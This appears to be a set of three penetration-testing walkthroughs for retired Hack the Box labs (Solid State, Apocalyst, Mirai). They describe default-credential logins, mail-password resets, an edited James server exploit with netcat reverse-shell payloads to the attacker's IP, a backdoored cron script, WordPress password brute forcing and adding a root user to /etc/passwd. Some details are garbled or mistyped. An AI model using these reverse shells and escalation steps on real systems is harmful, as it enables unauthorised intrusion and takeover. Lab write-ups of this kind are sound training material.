Hack the Box Challenge: Solid State Walkthrough

Hello Friends!! Today we are going to solve a CTF Challenge “Solid State”. It is a lab that is featured in Hack the Box. They have an amazing collection of Online Labs on which you can practice your penetration testing skills online. They have labs ranging from beginner to Expert. Solid State is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online therefore they have a static IP. Solid State Lab has IP: 10.10.10.51.

Now, as always let’s begin our hacking with the port enumeration.

Command: nmap 10.10.10.51 -sV -p- --open  

As you can see in the above screenshot that couple of ports open among which we have port 80, 110, 119, 4555.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP.

After opening the IP in the browser we can see that it is a basic website nothing exited.

Now back to 4555, it runs service James Remote Admin 2.3.2. After searching a while on the internet, I got that the default password for logging in the Remote Admin is root: root.

And it is a golden rule to apply the default credentials, so let’s try to get in Remote Admin using the default credentials. For this we will use netcat as shown below in image.

nc 10.10.10.51 4555

Great we have logged in on the Remote Admin Service, after that we ran the HELP command to get the List of working commands.

Here listusers command draws our attention, let’s see what it does. Great, we have the list of mail users on the server.

Back to the HELP command we had the setpassword command. Let’s use it to change the passwords of all the users so that we can further enumerate.

Command: setpassword james 1234

Ok, so now we have the users for the POP3 service and their passwords. Now lets dig into that, for that we will use telnet.

telnet 10.10.10.51 110

User: John

Pass: 1234

LIST

After logging in using the Credentials of the user john, we ran the command LIST, which lists all the messages in jhon’s account. Let see if we find something here.

Nope hardluck !! we didn’t get much in this but lets try another users

Again open a new telnet session but this time we enter the Credentials of user Mindy.

telnet 10.10.10.51 110

User: Mindy

Pass: 1234

list

Using LIST we got the mails in the account of mindy. Let’s open to see if we can get some hint to move forward in the mail.

After opening the mail we found sent mail from admin account by James to mindy  sharing his the SSH Login Credentials. It is a Jackpot!!

Username: mindy

Pass: P@55W0rd12@

Let’s go and get the ssh shell of the machine and use midy credential for login into ssh.

ssh mindy@10.10.10.51

Cool!! We got access of victim’s PTS shell.

Since we have enumerated the target network and found Apache James Serer 2.3.2 is running and after Browsing through the internet we stumbled across the Exploit DB module shown below, now copy the whole python code from here.

Paste above copied python code in a text file and make following changes inside payload as highlighted in below image and then save it, we have it as exploit.py on the desktop.

nc -e /bin/sh 10.10.14.3 8000

Here 10.10.14.3 is attacker’s IP and 8000 is listening port for reverse connection from targets network.

Now run above saved python file as I run using below command:

./exploit.py 10.10.10.51

Ok Done! The Exploit will work only when someone logs in. So let’s again login into SSH shell using the user Mindy’s Credentials and as soon as we login the exploit begin to work as shown below.

Let’s open a netcat Listener to get the shell which will be generated after our exploit gets completely executed. Now we need to import the python file to reach the terminal and to do so type:

python -c "import pty; pty.spawn('/bin/bash')"

Lovely!! So again we got access of victim’s system shell but this time we had access TTys shell of his system, now let check it directory.

ls

Here we can see user.txt which indicates we have almost completed our 1^st challenge.

I had use cat command for reading user.txt file and with this we had completed our first challenge.

Now let move towards 2^nd challenge for root.txt and currently we are in Mindy directory. For root.txt file we need to move into root but I have no idea for further step. Then I recall Mindy has received a mail from admin account send by James, there are chance of getting any hint from James therefore I prefer to grep running process of James by executing following command.

ps aux | grep james

Here aux will work as describe below:

a = display processes for all users
u = show the process's user/owner
x = show processes not attached to a terminal

Great!! It has shown root process for opt file.

Then I move into /opt directory and run ls-al command for exploring all files and folder inside this directory.

cd opt

ls-al

So it shown two files among which I’m interested in tmp.py file.

When I used cat command for reading this file I found a python code inside it. This code was useless for me and to me it useful I need to edit this file by adding malicious code inside it therefore let copy this code first into a text file.

As given below in image you can see I had edit netcat backdoor using following command and save the file tmp.py, then transfer this file into victim’s system.

/bin/nc -e bin/bash 10.10.14.3 8081

I tried to download our malicious tmp.py file inside /opt it get failed due to limited access therefore first I downloaded this file in /tmp directory using wget command.

wget http://10.10.14.4/tmp.py

When it get successfully downloaded then I replace it into /opt directory

cp tmp.py /opt

cd /opt

ls

Great!! We can see tmp.py file inside /opt lets confirm this file using cat command

cat tmp.py

Yeppii!!! We had successfully uploaded our one-liner netcat backdoor in victim’s system. Now let’s start netcat in a new terminal reverse connection.

nc -lvp 8081

Then I run crontab -l command for reverse connection and move back netcat terminal.

At netcat you will get reverse connection after 3 minutes from the time you will run crontab command. We have the root shell. And just by using the “ls” command we successfully located the root.txt

Great!! We got our 2nd flag successfully Enjoy Hacking!!

Hack the Box Challenge: Appoclyst Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Appoclyst ” which is available online for those who want to increase their skill in penetration testing and black box testing. Blocky is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Blocky craft which is designed for beginners.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.46 so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.46
From given below image, you can observe we found port 22, 80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue on its Apocalypse Preparation blog for next step.

We have entered in the /etc folder using the cd command, than we have used cat hosts command which has given us all the live host.

Next we decided to give the name of the third host in the browser. Which has given us the Welcome page of the Apocalyst lab along with a mesaage Apocalypse Preparation Blog.

Now we decided to use wpscan –u http://apocalyst.htb/ --enumerate t --enumerate p --enumerate u command on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins etc.

The wpscan has enumerated the usernames where we have found the login credentials as Falaraki.

Next we use dirb tool of kali to enumerate the directories from .txt file. The command we have used is dirb http://10.10.1046/ /root/Desktop/dict.txt .

Now that we have found an important directory named as Rightiousness in the .txt file we enumerated.

So next we decided to explore http://10.10.10.46/Rightiousness through browser URL and what we see is a image opened on the browser. As shown below.

The image got us wondering there must a clue behind. On second thought we decided to do Steganalysis on the image. Using the steghide --info image.jpg command in the kali terminal. And we found there is a list.txt file embedded behind the image.

Now we need to extract that list.txt file embedded behind the image. Therefore we used steghide --extract –sf image.jpg command for extraction. We simply need to leave the Enter passphrase option blank and Press Enter. List.txt file has successfully been extracted on our Desktop.

Again we have used wpscan to find out the password credentials for the login credentials Falaraki we earlier took using the wpscan. Here we have used wpscan –u http://10.10.1046 --username falaraki --wordlist /root/Desktop/list.txt command to enumerate the password from the list.txt file.

We see that for login credentials falaraki, the password credentials matched is Transclisiation.

After finding the username and password, we have used metasploit’s exploit wp_admin_shell_upload to upload the shell and get the meterpreter which is shown below.

Once we have got the meterpreter. We have used command ls –la /home to check what kind of directories are on home. Than we check inside the falaraki directory using command ls –la /home/falaraki, here we found out the user.txt file and used cat /home/falaraki/user.txt to read the file content which contains our first FLAG!!

Now we used command ls –la in the falaraki directory as shown. Here we discovered a file named .secret which left us curious to read its content using the cat .secret command. It contains an encoded code in base64 which we need to decode to read the content behind it.

Now to decode the encoded content in base64 we used command echo “Encoded Content” | base64 –d. This gave us decoded form of the content as shown in the image below.

Now Let’s we try access the user falaraki using ssh, here we have given command ssh falaraki@10.10.10.46 . To find the root flag.

On another terminal LinEnum tool from github which is very well known for checking privilege  escalation in directories. First we have downloaded the Linenum-master.zip file from github. After that we have shared the Linenum-master folder over the server by making a simple HTTP server on port 80 using command python –m SimpleHTTPServer 80.

Now we will download the shared file using wget http://10.10.14.3/LinEnum.sh command for our falaraki@apocalyst user. Now need to give permission to LinEnum.sh using command chmod 777 Linenum.sh. Now to execute it we have given command ./LinEnum.sh .

The LinEnum tool has given all the sensitive files that can be read/write in the falaraki directory.

In a new terminal we are using openssl to make a new salted combined username and password in MD5 algorithm. For this the command used is openssl passwd -1 –salt raj pass123.

Now using vi /etc/passwd command we are editing the passwd directory for adding a new user. The for the new user is username:Salted Value of username and password:0:0:root:/root:/bin/bash , we have saved this new user by using :wq command.

Now we simply check if the user has been successfully added or not, so as to find the. For this we have used su – raj command and in password we have given the password for this user which is pass123. We are finally in the root privilege of the Apocalyst by using ls command we see a root.txt file, whose content we would like to see by using the cat root.txt command. Finally we found our final FLAG!!

Hack the Box Challenge: Mirai Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Mirai” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Mirai lab.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Let’s Breach!!!

Lab IP: 10.10.10.48

Firstly let’s enumerate ports in context to identify running services and open ports of victim’s machine by using the most popular tool Nmap.

nmap  -p-  -A 10.10.10.48 --open

Awesome!! Nmap has done remarkable job by dumping the details of services running on open port 22 53, 80, 1031, 32400, 32469.

Without wasting time I used dirb tool of kali to enumerate the directories and found some important directories such as /admin/

dirb http://10.10.10.48

So next I decided to explore http://10.10.10.48/admin through browser URL. Here we have a Login Page, Lets Go through That.

When I link on login tab I saw following web page. The Pi-hole and the Logo gives us a pretty huge hint that the target machine is a Raspberry Pi, and Raspberry Pi comes with a default ssh

So we tried default ssh credentials on the Raspberry Pi.

User:                     pi

Password:           raspberry

Great!! Our predication works successfully and we got PTs shell of victim’s machine.

Now Let’s Look for the User Flag

cd Desktop

ls

here I found user.txt file and used cat “file name” command for reading this file.

cat user.txt

Great!! We got our 1^st flag successfully

And After Browsing we got the flag user.txt on the Location: ~/Desktop/user.txt

by executing sudo -l command it tell us that user pi has full privileged in this machine.

sudo -l

Then I moved for root access using previous same password and again I get root access successfully.

sudo bash

After going through the root directory we get a root.txt  But we get a Hint that our Root Flag is on a USB stick.

Let’s check if it is mounted by following command df

df (abbreviation for disk free) is a standard Unix command used to display the amount of available disk space for file systems on which the invoking user has appropriate read access. As you can see in the below screenshot that we have the USB stick on the Device. (From Wikipedia)

From given below image we can /media/usbstick.

Then execute given below command for further steps

cd media/usbstick

ls-al

Here we found a text file damnit.txt, using cat command we can read this file.

cat damnit.txt

Oops!! James has accidently deleted root.txt file. Now let’s try to find it somewhere with a little hope.

Move back to root directory and type following command which will scan /dev/sdb file system completely and hopefully it can find deleted root.txt file also.

Great!! We got our 2^st flag successfully

Enjoy Hacking!!